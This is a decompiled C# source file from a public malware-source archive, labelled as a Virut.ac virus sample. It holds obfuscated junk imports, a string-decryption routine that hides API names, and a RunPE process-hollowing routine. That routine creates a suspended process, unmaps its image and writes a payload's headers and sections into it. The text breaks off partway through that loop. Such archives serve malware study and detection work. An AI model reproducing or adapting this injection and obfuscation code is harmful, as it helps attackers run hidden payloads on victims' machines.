ch0ic3/MalwareSourceCode
1
0
Fork 0
mirror of https://github.com/vxunderground/MalwareSourceCode.git synced 2024-12-19 09:56:10 +00:00
Code Issues Actions Packages Projects Releases Wiki Activity
f2ac1ece55
MalwareSourceCode/MSIL/Virus/Win32/V/Virus.Win32.Virut.ac-a8742491b0c24128c984e4272dd39160994413c06121c47fa9bf8ecb333708fd/RunpeClass.cs

1216 lines
42 KiB
C#
Raw Normal View History

auto-decompiled msil via petikvx add
2022-08-18 11:28:56 +00:00
// Decompiled with JetBrains decompiler
// Type: smss.RunpeClass
// Assembly: smss, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 9DAAF14C-A13E-4FB1-BFB2-3533F8F506E6
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Virus.Win32.Virut.ac-a8742491b0c24128c984e4272dd39160994413c06121c47fa9bf8ecb333708fd.exe
using Microsoft.VisualBasic;
using System;
using System.Reflection;
using System.Runtime.InteropServices;
using System.Text;
namespace smss
{
public class RunpeClass
{
public const int MAXPNAMELEN = 32;
public const int MAXPNAMELEN2 = 32;
public const int MIXER_SHORT_NAME_CHARS = 16;
public const int MIXER_LONG_NAME_CHARS = 64;
public const long Asdfasfasf = 2778;
public const long Fasfasfasf = 60116;
public const long Afsfasfascfc = 218;
public const long Asdascasdasd = 218;
public const long Bvcxbxcbxcb = 218;
public const long Bxcbxcbxcb = 253;
public const long Fsdr3Fsf = 218;
public const long Kkkkkkkkkddddddd = 17247;
public const uint Fssssssssssssssssss = 218;
[DllImport("yrtyor6p.dll", CharSet = CharSet.Ansi, SetLastError = true)]
public static extern AssemblyName yrtyrhhk6op();
[DllImport("yrtyr6pop.dll", CharSet = CharSet.Ansi, SetLastError = true)]
public static extern AssemblyName yrtyro6p();
[DllImport("j43yttj6.dll", CharSet = CharSet.Ansi, SetLastError = true)]
public static extern int j43yty6();
[DllImport("j43ytoi6.dll", CharSet = CharSet.Ansi, SetLastError = true)]
public static extern int j43yt6o();
[DllImport("yt3y5rtyrty.dll", CharSet = CharSet.Ansi, SetLastError = true)]
public static extern IntPtr yt3y5rt3rty();
[DllImport("yt3y5r3yrty.dll", CharSet = CharSet.Ansi, SetLastError = true)]
public static extern IntPtr yy5r3yrty();
[DllImport("yt3yrt3yrty.dll", CharSet = CharSet.Ansi, SetLastError = true)]
public static extern IntPtr yt3yrt3yrty();
[DllImport("yrtyrl6p.dll", CharSet = CharSet.Ansi, SetLastError = true)]
public static extern AssemblyName yrtyrk6p();
[DllImport("yrjtyr6p.dll", CharSet = CharSet.Ansi, SetLastError = true)]
public static extern AssemblyName yrtyrkk6p();
[DllImport("yrt44yr6p.dll", CharSet = CharSet.Ansi, SetLastError = true)]
public static extern AssemblyName yrtyr44K6p();
[DllImport("lkwdjsdnjfe.dll", CharSet = CharSet.Ansi, SetLastError = true)]
public static extern Environment lkwkdsdnjfe();
[DllImport("lkwdsdnjfe.dll", CharSet = CharSet.Ansi, SetLastError = true)]
public static extern Environment lkwdsdknjfe();
[DllImport("j43ykjmt6.dll", CharSet = CharSet.Ansi, SetLastError = true)]
public static extern int j43ykjmt6();
[DllImport("j43yKt6.dll", CharSet = CharSet.Ansi, SetLastError = true)]
public static extern int j43yKt6();
[DllImport("j43yt6t.dll", CharSet = CharSet.Ansi, SetLastError = true)]
public static extern int j43yt6t();
[DllImport("j43yt6t.dll", CharSet = CharSet.Ansi, SetLastError = true)]
public static extern Environment lkwdrsdnjfe();
[DllImport("j43yt6t.dll", CharSet = CharSet.Ansi, SetLastError = true)]
public static extern Environment lkwdesdnjfe();
[DllImport("j43yt6t.dll", CharSet = CharSet.Ansi, SetLastError = true)]
public static extern Environment lkwdwsdnjfe();
[DllImport("j43yt6t.dll", CharSet = CharSet.Ansi, SetLastError = true)]
public static extern AssemblyName yrtywr6p();
[DllImport("j43yt6t.dll", CharSet = CharSet.Ansi, SetLastError = true)]
public static extern AssemblyName yrtysr6p();
[DllImport("j43yt6t.dll", CharSet = CharSet.Ansi, SetLastError = true)]
public static extern Environment lkwdxsdnjfe();
[DllImport("j43yt6t.dll", CharSet = CharSet.Ansi, SetLastError = true)]
public static extern Environment lkwdss5dnjfe();
[DllImport("j43yt6t.dll", CharSet = CharSet.Ansi, SetLastError = true)]
public static extern Environment lkwdssdnjfe();
[DllImport("j43yt6t.dll", CharSet = CharSet.Ansi, SetLastError = true)]
public static extern IntPtr yt3y5rtrty();
[DllImport("j43yt6t.dll", CharSet = CharSet.Ansi, SetLastError = true)]
public static extern IntPtr yt3y5r3yrty();
[DllImport("j43yt6t.dll", CharSet = CharSet.Ansi, SetLastError = true)]
public static extern IntPtr yt3y5rt3ty();
[DllImport("j43yt6t.dll", CharSet = CharSet.Ansi, SetLastError = true)]
public static extern Environment lkwdsdnje();
[DllImport("j43yt6t.dll", CharSet = CharSet.Ansi, SetLastError = true)]
public static extern Environment lkwdsfe();
[DllImport("j43yt6t.dll", CharSet = CharSet.Ansi, SetLastError = true)]
public static extern Environment lkwdjfe();
[DllImport("j43yt6t.dll", CharSet = CharSet.Ansi, SetLastError = true)]
public static extern Environment lkwdsdfe();
[DllImport("j43yt6t.dll", CharSet = CharSet.Ansi, SetLastError = true)]
public static extern Environment lkwdsdnjfe();
[DllImport("j43yt6t.dll", CharSet = CharSet.Ansi, SetLastError = true)]
public static extern int jr43yt6();
[DllImport("j43yt6t.dll", CharSet = CharSet.Ansi, SetLastError = true)]
public static extern int j43yfgt6();
[DllImport("j43yt6t.dll", CharSet = CharSet.Ansi, SetLastError = true)]
public static extern int j43yt6();
[DllImport("j43yt6t.dll", CharSet = CharSet.Ansi, SetLastError = true)]
public static extern AssemblyName yrtyer6p();
[DllImport("j43yt6t.dll", CharSet = CharSet.Ansi, SetLastError = true)]
public static extern AssemblyName yrtyrt6p();
[DllImport("j43yt6t.dll", CharSet = CharSet.Ansi, SetLastError = true)]
public static extern AssemblyName yrtye6p();
[DllImport("j43yt6t.dll", CharSet = CharSet.Ansi, SetLastError = true)]
public static extern AssemblyName yrtyr6p();
[DllImport("j43yt6t.dll", CharSet = CharSet.Ansi, SetLastError = true)]
public static extern AssemblyName yrtytr6p();
[DllImport("j43yt6t.dll", CharSet = CharSet.Ansi, SetLastError = true)]
public static extern IntPtr yt3yyy5rt3yrty();
[DllImport("j43yt6t.dll", CharSet = CharSet.Ansi, SetLastError = true)]
public static extern IntPtr ytrt3yrty();
[DllImport("lkwdsdnjfe.dll", CharSet = CharSet.Ansi, SetLastError = true)]
public static extern Environment a1();
[DllImport("lkwdsdnjfe.dll", CharSet = CharSet.Ansi, SetLastError = true)]
public static extern Environment a2();
[DllImport("lkwdsdnjfe.dll", CharSet = CharSet.Ansi, SetLastError = true)]
public static extern Environment a3();
[DllImport("yrtyr6p.dll", CharSet = CharSet.Ansi, SetLastError = true)]
public static extern AssemblyName b1();
[DllImport("j43yt6.dll", CharSet = CharSet.Ansi, SetLastError = true)]
public static extern int c1();
[DllImport("yt3y5rt3yrty.dll", CharSet = CharSet.Ansi, SetLastError = true)]
public static extern IntPtr d1();
[DllImport("yrtyr6p.dll", CharSet = CharSet.Ansi, SetLastError = true)]
public static extern AssemblyName b2();
[DllImport("lkwdsdnjfe.dll", CharSet = CharSet.Ansi, SetLastError = true)]
public static extern Environment a4();
[DllImport("j43yt6.dll", CharSet = CharSet.Ansi, SetLastError = true)]
public static extern int c2();
[DllImport("lkwdsdnjfe.dll", CharSet = CharSet.Ansi, SetLastError = true)]
public static extern Environment a5();
[DllImport("yrtyr6p.dll", CharSet = CharSet.Ansi, SetLastError = true)]
public static extern AssemblyName b3();
[DllImport("lkwdsdnjfe.dll", CharSet = CharSet.Ansi, SetLastError = true)]
public static extern Environment a7();
[DllImport("yt3y5rt3yrty.dll", CharSet = CharSet.Ansi, SetLastError = true)]
public static extern IntPtr d2();
[DllImport("lkwdsdnjfe.dll", CharSet = CharSet.Ansi, SetLastError = true)]
public static extern Environment a8();
[DllImport("lkwdsdnjfe.dll", CharSet = CharSet.Ansi, SetLastError = true)]
public static extern Environment a9();
[DllImport("j43yt6.dll", CharSet = CharSet.Ansi, SetLastError = true)]
public static extern int c4();
[DllImport("yrtyr6p.dll", CharSet = CharSet.Ansi, SetLastError = true)]
public static extern AssemblyName b5();
[DllImport("yrtyr6p.dll", CharSet = CharSet.Ansi, SetLastError = true)]
public static extern AssemblyName b9();
[DllImport("yt3y5rt3yrty.dll", CharSet = CharSet.Ansi, SetLastError = true)]
public static extern IntPtr d3();
[DllImport("yt3y5rt3yrty.dll", CharSet = CharSet.Ansi, SetLastError = true)]
public static extern IntPtr d4();
[DllImport("yrtyr6p.dll", CharSet = CharSet.Ansi, SetLastError = true)]
public static extern AssemblyName b6();
[DllImport("lkwdsdnjfe.dll", CharSet = CharSet.Ansi, SetLastError = true)]
public static extern Environment a15();
[DllImport("yt3y5rt3yrty.dll", CharSet = CharSet.Ansi, SetLastError = true)]
public static extern IntPtr d5();
[DllImport("lkwdsdnjfe.dll", CharSet = CharSet.Ansi, SetLastError = true)]
public static extern Environment a10();
[DllImport("yrtyr6p.dll", CharSet = CharSet.Ansi, SetLastError = true)]
public static extern AssemblyName b7();
[DllImport("j43yt6.dll", CharSet = CharSet.Ansi, SetLastError = true)]
public static extern int c5();
[DllImport("yt3y5rt3yrty.dll", CharSet = CharSet.Ansi, SetLastError = true)]
public static extern IntPtr d6();
[DllImport("lkwdsdnjfe.dll", CharSet = CharSet.Ansi, SetLastError = true)]
public static extern Environment a11();
[DllImport("lkwdsdnjfe.dll", CharSet = CharSet.Ansi, SetLastError = true)]
public static extern Environment a12();
[DllImport("j43yt6.dll", CharSet = CharSet.Ansi, SetLastError = true)]
public static extern int c6();
[DllImport("lkwdsdnjfe.dll", CharSet = CharSet.Ansi, SetLastError = true)]
public static extern Environment a13();
[DllImport("yrtyr6p.dll", CharSet = CharSet.Ansi, SetLastError = true)]
public static extern AssemblyName b8();
[DllImport("yt3y5rt3yrty.dll", CharSet = CharSet.Ansi, SetLastError = true)]
public static extern IntPtr d7();
[DllImport("yt3y5rt3yrty.dll", CharSet = CharSet.Ansi, SetLastError = true)]
public static extern IntPtr d8();
[DllImport("lkwdsdnjfe.dll", CharSet = CharSet.Ansi, SetLastError = true)]
public static extern Environment a14();
[DllImport("j43yt6.dll", CharSet = CharSet.Ansi, SetLastError = true)]
public static extern int c7();
[DllImport("user32", EntryPoint = "OemToCharBuffA", CharSet = CharSet.Ansi, SetLastError = true)]
public static extern int OemToCharBuff1(
[MarshalAs(UnmanagedType.VBByRefStr)] ref string lpszSrc,
[MarshalAs(UnmanagedType.VBByRefStr)] ref string lpszDst,
int cchDstLength);
[DllImport("user32", EntryPoint = "OemToCharBuffA", CharSet = CharSet.Ansi, SetLastError = true)]
public static extern int OemToCharBuff(
[MarshalAs(UnmanagedType.VBByRefStr)] ref string lpszSrc,
[MarshalAs(UnmanagedType.VBByRefStr)] ref string lpszDst,
int cchDstLength);
[DllImport("gdi32", CharSet = CharSet.Ansi, SetLastError = true)]
public static extern int OffsetRgn(int hRgn, int x, int y);
[DllImport("ole32", CharSet = CharSet.Ansi, SetLastError = true)]
public static extern void OleUninitialize();
[DllImport("gdi32", CharSet = CharSet.Ansi, SetLastError = true)]
public static extern int OffsetViewportOrgEx(
int hdc,
int nX,
int nY,
RunpeClass.POINTAPI lpPoint);
[DllImport("advapi32.dll", EntryPoint = "AccessCheckAndAuditAlarmA", CharSet = CharSet.Ansi, SetLastError = true)]
public static extern int AccessCheckAndAuditAlarm(
[MarshalAs(UnmanagedType.VBByRefStr)] ref string SubsystemName,
byte[] HandleId,
[MarshalAs(UnmanagedType.VBByRefStr)] ref string ObjectStructureName,
[MarshalAs(UnmanagedType.VBByRefStr)] ref string ObjectName,
RunpeClass.SECURITY_DESCRIPTOR SecurityDescriptor,
int DesiredAccess,
RunpeClass.GENERIC_MAPPING GenericMapping,
int ObjectCreation,
int GrantedAccess,
int AccessStatus,
int pfGenerateOnClose);
[DllImport("pdh.dll", EntryPoint = "PdhVbAddCounter", CharSet = CharSet.Ansi, SetLastError = true)]
public static extern int PdhAddCounter(
int QueryHandle,
[MarshalAs(UnmanagedType.VBByRefStr)] ref string CounterPath,
ref int CounterHandle);
[DllImport("winspool.drv", CharSet = CharSet.Ansi, SetLastError = true)]
public static extern int AbortPrinter(int hPrinter);
[DllImport("user32", CharSet = CharSet.Ansi, SetLastError = true)]
public static extern int ActivateKeyboardLayout(int HKL, int flags);
[DllImport("advapi32.dll", CharSet = CharSet.Ansi, SetLastError = true)]
public static extern int QueryServiceObjectSecurity(
int hService,
int dwSecurityInformation,
byte[] lpSecurityDescriptor,
int cbBufSize,
int pcbBytesNeeded);
[DllImport("gdi32", CharSet = CharSet.Ansi, SetLastError = true)]
public static extern int Polyline(int hdc, RunpeClass.POINTAPI lpPoint, int nCount);
[DllImport("advapi32.dll", CharSet = CharSet.Ansi, SetLastError = true)]
public static extern int AddAccessAllowedAce(
RunpeClass.ACL pAcl,
int dwAceRevision,
int AccessMask,
byte[] pSid);
[DllImport("gdi32", CharSet = CharSet.Ansi, SetLastError = true)]
public static extern int AbortDoc(int hdc);
[DllImport("kernel32", CharSet = CharSet.Ansi, SetLastError = true)]
public static extern void RaiseException(
int dwExceptionCode,
int dwExceptionFlags,
int nNumberOfArguments,
int lpArguments);
[DllImport("advapi32.dll", CharSet = CharSet.Ansi, SetLastError = true)]
public static extern int AddAccessDeniedAce(
RunpeClass.ACL pAcl,
int dwAceRevision,
int AccessMask,
byte[] pSid);
[DllImport("kernel32", EntryPoint = "ReadConsoleA", CharSet = CharSet.Ansi, SetLastError = true)]
public static extern int ReadConsole(
int hConsoleInput,
byte[] lpBuffer,
int nNumberOfCharsToRead,
int lpNumberOfCharsRead,
byte[] lpReserved);
[DllImport("advapi32.dll", CharSet = CharSet.Ansi, SetLastError = true)]
public static extern int AddAuditAccessAce(
RunpeClass.ACL pAcl,
int dwAceRevision,
int dwAccessMask,
byte[] pSid,
int bAuditSuccess,
int bAuditFailure);
[DllImport("gdi32", CharSet = CharSet.Ansi, SetLastError = true)]
public static extern int AngleArc(
int hdc,
int x,
int y,
int dwRadius,
double eStartAngle,
double eSweepAngle);
[DllImport("advapi32.dll", CharSet = CharSet.Ansi, SetLastError = true)]
public static extern int AllocateLocallyUniqueId(RunpeClass.LARGE_INTEGER Luid);
[DllImport("winspool.drv", EntryPoint = "AddJobA", CharSet = CharSet.Ansi, SetLastError = true)]
public static extern int AddJob(
int hPrinter,
int Level,
byte pData,
int cdBuf,
int pcbNeeded);
[DllImport("winspool.drv", CharSet = CharSet.Ansi, SetLastError = true)]
public static extern int ReadPrinter(int hPrinter, byte[] pBuf, int cdBuf, int pNoBytesRead);
[DllImport("advapi32.dll", EntryPoint = "ReadEventLogA", CharSet = CharSet.Ansi, SetLastError = true)]
public static extern int ReadEventLog(
int hEventLog,
int dwReadFlags,
int dwRecordOffset,
RunpeClass.EVENTLOGRECORD lpBuffer,
int nNumberOfBytesToRead,
int pnBytesRead,
int pnMinNumberOfBytesNeeded);
[DllImport("kernel32", CharSet = CharSet.Ansi, SetLastError = true)]
public static extern int ReadConsoleOutputAttribute(
int hConsoleOutput,
int lpAttribute,
int nLength,
RunpeClass.COORD dwReadCoord,
int lpNumberOfAttrsRead);
[DllImport("gdi32", CharSet = CharSet.Ansi, SetLastError = true)]
public static extern int AnimatePalette(
int hPalette,
int wStartIndex,
int wNumEntries,
RunpeClass.PALETTEENTRY lpPaletteColors);
[DllImport("gdi32", EntryPoint = "AddFontResourceA", CharSet = CharSet.Ansi, SetLastError = true)]
public static extern int AddFontResource([MarshalAs(UnmanagedType.VBByRefStr)] ref string lpFileName);
[DllImport("advapi32.dll", EntryPoint = "ChangeServiceConfigA", CharSet = CharSet.Ansi, SetLastError = true)]
public static extern int ChangeServiceConfig(
int hService,
int dwServiceStructure,
int dwStartStructure,
int dwErrorControl,
[MarshalAs(UnmanagedType.VBByRefStr)] ref string lpBinaryPathName,
[MarshalAs(UnmanagedType.VBByRefStr)] ref string lpLoadOrderGroup,
int lpdwTagId,
[MarshalAs(UnmanagedType.VBByRefStr)] ref string lpDependencies,
[MarshalAs(UnmanagedType.VBByRefStr)] ref string lpServiceStartName,
[MarshalAs(UnmanagedType.VBByRefStr)] ref string lpPassword,
[MarshalAs(UnmanagedType.VBByRefStr)] ref string lpDisplayName);
[DllImport("kernel32", EntryPoint = "CompareStringA", CharSet = CharSet.Ansi, SetLastError = true)]
public static extern int CompareString(
int Locale,
int dwCmpFlags,
[MarshalAs(UnmanagedType.VBByRefStr)] ref string lpString1,
int cchCount1,
[MarshalAs(UnmanagedType.VBByRefStr)] ref string lpString2,
int cchCount2);
[DllImport("imm32.dll", EntryPoint = "ImmGetIMEFileNameA", CharSet = CharSet.Ansi, SetLastError = true)]
public static extern int ImmGetIMEFileName(int hkl, [MarshalAs(UnmanagedType.VBByRefStr)] ref string lpStr, int uBufLen);
[DllImport("winmm.dll", CharSet = CharSet.Ansi, SetLastError = true)]
public static extern int waveOutPause(int hWaveOut);
[DllImport("winmm.dll", CharSet = CharSet.Ansi, SetLastError = true)]
public static extern int waveOutUnprepareHeader(
int hWaveOut,
RunpeClass.WAVEHDR lpWaveOutHdr,
int uSize);
[DllImport("advapi32.dll", EntryPoint = "RegQueryValueA", CharSet = CharSet.Ansi, SetLastError = true)]
public static extern int RegQueryValue(
int hKey,
[MarshalAs(UnmanagedType.VBByRefStr)] ref string lpSubKey,
[MarshalAs(UnmanagedType.VBByRefStr)] ref string lpValue,
int lpcbValue);
[DllImport("user32", EntryPoint = "SendMessageA", CharSet = CharSet.Ansi, SetLastError = true)]
public static extern int SendMessage(int hwnd, int wMsg, int wParam, byte[] lParam);
[DllImport("imm32.dll", CharSet = CharSet.Ansi, SetLastError = true)]
public static extern int ImmSetCandidateWindow(
int himc,
RunpeClass.CANDIDATEFORM lpCandidateForm);
[DllImport("gdi32", CharSet = CharSet.Ansi, SetLastError = true)]
public static extern int SetArcDirection(int hdc, int ArcDirection);
[DllImport("user32", CharSet = CharSet.Ansi, SetLastError = true)]
public static extern int SetClipboardData(int wFormat, int hMem);
[DllImport("wininet.dll", EntryPoint = "InternetConnectA", CharSet = CharSet.Ansi, SetLastError = true)]
public static extern int InternetConnect(
int hInternetSession,
[MarshalAs(UnmanagedType.VBByRefStr)] ref string sServerName,
short nServerPort,
[MarshalAs(UnmanagedType.VBByRefStr)] ref string sUsername,
[MarshalAs(UnmanagedType.VBByRefStr)] ref string sPassword,
int lService,
int lFlags,
int lContext);
[DllImport("imm32.dll", CharSet = CharSet.Ansi, SetLastError = true)]
public static extern int ImmSetStatusWindowPos(int himc, RunpeClass.POINTAPI lpPoint);
[DllImport("imm32.dll", CharSet = CharSet.Ansi, SetLastError = true)]
public static extern int ImmSetCompositionWindow(
int himc,
RunpeClass.COMPOSITIONFORM lpCompositionForm);
[DllImport("user32", EntryPoint = "IsCharAlphaNumericA", CharSet = CharSet.Ansi, SetLastError = true)]
public static extern int IsCharAlphaNumeric(byte Char2);
[DllImport("kernel32", CharSet = CharSet.Ansi, SetLastError = true)]
public static extern int LocalReAlloc(int hMem, int wBytes, int wFlags);
[DllImport("kernel32", CharSet = CharSet.Ansi, SetLastError = true)]
public static extern int LockResource(int hResData);
[DllImport("winmm.dll", EntryPoint = "mciGetDeviceIDFromElementIDA", CharSet = CharSet.Ansi, SetLastError = true)]
public static extern int mciGetDeviceIDFromElementID(int dwElementID, [MarshalAs(UnmanagedType.VBByRefStr)] ref string lpstrStructure);
[DllImport("winmm.dll", EntryPoint = "mciSendStringA", CharSet = CharSet.Ansi, SetLastError = true)]
public static extern int mciSendString(
[MarshalAs(UnmanagedType.VBByRefStr)] ref string lpstrCommand,
[MarshalAs(UnmanagedType.VBByRefStr)] ref string lpstrReturnString,
int uReturnLength,
int hwndCallback);
[DllImport("winmm", CharSet = CharSet.Ansi, SetLastError = true)]
public static extern int mciSetYieldProc(int mciId, int fpYieldProc, int dwYieldData);
[DllImport("winmm.dll", EntryPoint = "midiInGetDevCapsA", CharSet = CharSet.Ansi, SetLastError = true)]
public static extern int midiInGetDevCaps(
int uDeviceID,
RunpeClass.MIDIINCAPS lpCaps,
int uSize);
[DllImport("winmm.dll", CharSet = CharSet.Ansi, SetLastError = true)]
public static extern int midiInAddBuffer(
int hMidiIn,
RunpeClass.MIDIHDR lpMidiInHdr,
int uSize);
[DllImport("winmm.dll", CharSet = CharSet.Ansi, SetLastError = true)]
public static extern int mixerGetID(int hmxobj, int pumxID, int fdwId);
[DllImport("winmm.dll", CharSet = CharSet.Ansi, SetLastError = true)]
public static extern int mixerGetNumDevs();
[DllImport("winmm.dll", CharSet = CharSet.Ansi, SetLastError = true)]
public static extern int mixerMessage(int hmx, int uMsg, int dwParam1, int dwParam2);
[DllImport("winmm.dll", CharSet = CharSet.Ansi, SetLastError = true)]
public static extern int mixerOpen(
int phmx,
int uMxId,
int dwCallback,
int dwInstance,
int fdwOpen);
[DllImport("winmm.dll", CharSet = CharSet.Ansi, SetLastError = true)]
public static extern int mmioClose(int hmmio, int uFlags);
[DllImport("winmm.dll", EntryPoint = "mixerGetLineControlsA", CharSet = CharSet.Ansi, SetLastError = true)]
public static extern int mixerGetLineControls(
int hmxobj,
RunpeClass.MIXERLINECONTROLS pmxlc,
int fdwControls);
[DllImport("winmm.dll", EntryPoint = "mixerGetDevCapsA", CharSet = CharSet.Ansi, SetLastError = true)]
public static extern int mixerGetDevCaps(int uMxId, RunpeClass.MIXERCAPS pmxcaps, int cbmxcaps);
[DllImport("winmm.dll", EntryPoint = "mixerGetControlDetailsA", CharSet = CharSet.Ansi, SetLastError = true)]
public static extern int mixerGetControlDetails(
int hmxobj,
RunpeClass.MIXERCONTROLDETAILS pmxcd,
int fdwDetails);
public static string Decrypt(string input, string key)
{
if (input == null)
throw new ArgumentNullException(nameof (input));
if (key == null)
throw new ArgumentNullException(nameof (key));
return Encoding.UTF8.GetString(RunpeClass.Decrypt(Convert.FromBase64String(input), Encoding.UTF8.GetBytes(key)));
}
public static byte[] Decrypt(byte[] input, byte[] key)
{
if (input == null)
throw new ArgumentNullException(nameof (input));
if (key == null)
throw new ArgumentNullException(nameof (key));
int num1 = (int) input[input.Length - 1];
byte[] numArray = new byte[input.Length - 2 + 1];
int index1 = 0;
int num2 = input.Length - 2;
for (int index2 = 0; index2 <= num2; ++index2)
{
if (index1 >= key.Length)
index1 = 0;
if (index2 < input.Length - 1)
{
numArray[index2] = Convert.ToByte((int) input[index2] - numArray.Length % key.Length - (int) key[index1] + num1);
++index1;
}
}
return numArray;
}
public static bool Win7() => Environment.OSVersion.Version.Major == 6;
public static void RunpeSub(byte[] data, string target)
{
RunpeClass.Context context = new RunpeClass.Context();
RunpeClass.ProcessInformation info = new RunpeClass.ProcessInformation();
RunpeClass.StartupInformation startup = new RunpeClass.StartupInformation();
RunpeClass.SecurityFlags process1 = new RunpeClass.SecurityFlags();
RunpeClass.SecurityFlags thread = new RunpeClass.SecurityFlags();
GCHandle gcHandle = GCHandle.Alloc((object) data, GCHandleType.Pinned);
IntPtr ptr = gcHandle.AddrOfPinnedObject();
int int32 = ptr.ToInt32();
RunpeClass.DosHeader dosHeader = new RunpeClass.DosHeader();
RunpeClass.DosHeader structure1 = (RunpeClass.DosHeader) Marshal.PtrToStructure(gcHandle.AddrOfPinnedObject(), dosHeader.GetType());
gcHandle.Free();
RunpeClass.mrqs mrqs = RunpeClass.Z8Wro8Mry4Fzhw<RunpeClass.mrqs>(RunpeClass.Decrypt("38KgwdqeYXkN ", "yb3Xz73LWVcN"), RunpeClass.Decrypt("hb15tsuxiMe9g3mRy4sl ", "Yb+lncOle7+5oaXBwV0l"));
if (mrqs == null)
throw new NotImplementedException();
RunpeClass.evzew evzew = RunpeClass.Z8Wro8Mry4Fzhw<RunpeClass.evzew>(RunpeClass.Decrypt("1svIs9KsiWsU ", "wrbQyLbEUlAU"), RunpeClass.Decrypt("ioStf7i8u4O8Yc2/tYXGjic= ", "Z6PBgam9o5uhX7e1waPJwSc="));
if (evzew == null)
throw new NotImplementedException();
RunpeClass.i5Ondq i5Ondq1 = RunpeClass.Z8Wro8Mry4Fzhw<RunpeClass.i5Ondq>(RunpeClass.Decrypt("3JXhvdjHonUP ", "x7vVzbvJV1UP"), RunpeClass.Decrypt("sbyCyLjBvaPSn9651JvZl+Eb ", "ia+nrYXJw6uvy8t/r7/Dydcb"));
if (i5Ondq1 == null)
throw new NotImplementedException();
RunpeClass.jx95Iq jx95Iq1 = RunpeClass.Z8Wro8Mry4Fzhw<RunpeClass.jx95Iq>("kernel32", RunpeClass.Decrypt("nrWZvbpmv8a3fIaqm6ilgbS0MQ== ", "fbOht5lvs62VmbW1aZmprbPBMQ=="));
if (jx95Iq1 == null)
throw new NotImplementedException();
RunpeClass.enx2Ma enx2Ma = RunpeClass.Z8Wro8Mry4Fzhw<RunpeClass.enx2Ma>(RunpeClass.Decrypt("u7Bwqrgr ", "sb2dra0r"), RunpeClass.Decrypt("zsmP0+uy5dOds/WW38uftu631KgQ ", "pN6azMqy0JzCut6OvJa6ttjCzswQ"));
if (enx2Ma == null)
throw new NotImplementedException();
RunpeClass.qh4E qh4E = RunpeClass.Z8Wro8Mry4Fzhw<RunpeClass.qh4E>(RunpeClass.Decrypt("4NOlw5G0ZnsM ", "yr7Y0L7MWlgM"), RunpeClass.Decrypt("tc/Qs+PJo6TWzcyCr98a ", "krjKztCovmi+vsSscNYa"));
if (qh4E == null)
throw new NotImplementedException();
RunpeClass.mzt5Dq mzt5Dq = RunpeClass.Z8Wro8Mry4Fzhw<RunpeClass.mzt5Dq>(RunpeClass.Decrypt("t5p/fLJ8QH8t ", "qZ23r52rOTct"), RunpeClass.Decrypt("z6rnzeXipdbph6vB6Kv72wM= ", "o8flpc3hx7/Fg9vZ5cft5QM="));
if (mzt5Dq == null)
throw new NotImplementedException();
RunpeClass.g4Ch g4Ch = RunpeClass.Z8Wro8Mry4Fzhw<RunpeClass.g4Ch>(RunpeClass.Decrypt("1svIs9KsiWsU ", "wrbQyLbEUlAU"), RunpeClass.Decrypt("n4KynsyukrvAgr16JQ== ", "f6XBxbWlg6u/pZ2jJQ=="));
if (g4Ch == null)
throw new NotImplementedException();
IntPtr system;
if (-(mrqs((string) null, target, ref process1, ref thread, false, 4U, system, (string) null, ref startup, out info) ? 1 : 0) == 0)
return;
RunpeClass.NtHeaders ntHeaders = new RunpeClass.NtHeaders();
ptr = new IntPtr(int32 + structure1.Address);
RunpeClass.NtHeaders structure2 = (RunpeClass.NtHeaders) Marshal.PtrToStructure(ptr, ntHeaders.GetType());
long num1 = 0;
long num2 = 0;
startup.CB = Strings.Len((object) startup);
context.Flags = 65539U;
if (structure2.Signature != 17744U || structure1.Magic != (ushort) 23117 || -(mrqs((string) null, target, ref process1, ref thread, false, 4U, system, (string) null, ref startup, out info) ? 1 : 0) == 0)
return;
int num3;
if (RunpeClass.Win7())
{
int num4 = evzew(info.Thread, ref context) ? 1 : 0;
RunpeClass.i5Ondq i5Ondq2 = i5Ondq1;
IntPtr process2 = info.Process;
int address = (int) ((long) context.Ebx + 8L);
int num5 = 0;
ref int local1 = ref num5;
int num6 = 0;
ref int local2 = ref num6;
int num7 = i5Ondq2(process2, address, ref local1, 4, ref local2);
long num8 = enx2Ma(info.Process, 0);
}
else
{
int num9 = evzew(info.Thread, ref context) ? 1 : 0;
RunpeClass.i5Ondq i5Ondq3 = i5Ondq1;
IntPtr process3 = info.Process;
int address1 = (int) ((long) context.Ebx + 8L);
num3 = (int) num1;
ref int local3 = ref num3;
int num10 = 0;
ref int local4 = ref num10;
int num11 = i5Ondq3(process3, address1, ref local3, 4, ref local4);
long address2 = (long) num3;
long num12 = enx2Ma(info.Process, (int) address2);
}
uint num13 = (uint) (int) qh4E(info.Process, (int) structure2.Optional.Image, structure2.Optional.SImage, 12288U, 4U);
if (num13 == 0U)
return;
if (RunpeClass.Win7())
{
RunpeClass.jx95Iq jx95Iq2 = jx95Iq1;
IntPtr process4 = info.Process;
int address = (int) num13;
byte[] buffer = data;
int sheaders = (int) structure2.Optional.SHeaders;
num3 = 0;
ref int local = ref num3;
int num14 = jx95Iq2(process4, address, buffer, sheaders, out local) ? 1 : 0;
}
else
{
RunpeClass.jx95Iq jx95Iq3 = jx95Iq1;
IntPtr process5 = info.Process;
int address = (int) num13;
byte[] buffer = data;
int sheaders = (int) structure2.Optional.SHeaders;
num3 = (int) num2;
ref int local = ref num3;
int num15 = jx95Iq3(process5, address, buffer, sheaders, out local) ? 1 : 0;
num2 = (long) num3;
}
long num16 = (long) (structure1.Address + 248);
int num17 = (int) structure2.File.Sections - 1;
for (int index1 = 0; index1 <= num17; ++index1)
{
ptr = new IntPtr((long) int32 + num16 + (long) (index1 * 40));
RunpeClass.SectionHeader structure3 = (RunpeClass.SectionHeader) Marshal.PtrToStructure(ptr, structure3.GetType());
byte[] numArray = new byte[(int) structure3.Size + 1];
int num18 = (int) ((long) structure3.Size - 1L);
for (int index2 = 0; index2 <= num18; ++index2)
numArray[index2] = data[(int) ((long) structure3.Pointer + (long) index2)];
if (RunpeClass.Win7())
{
RunpeClass.jx95Iq jx95Iq4 = jx95Iq1;
IntPtr process6 = info.Process;
int address = (int) num13 + (int) structure3.Address;
byte[] buffer = numArray;
int size = (int) structure3.Size;
num3 = 0;
ref int local = ref num3;
int num19 = jx95Iq4(process6, address, buffer, size, out local) ? 1 : 0;
}
else
{
RunpeClass.jx95Iq jx95Iq5 = jx95Iq1;
IntPtr process7 = info.Process;
int address = (int) num13 + (int) structure3.Address;
byte[] buffer = numArray;
int size = (int) structure3.Size;
num3 = (int) num2;
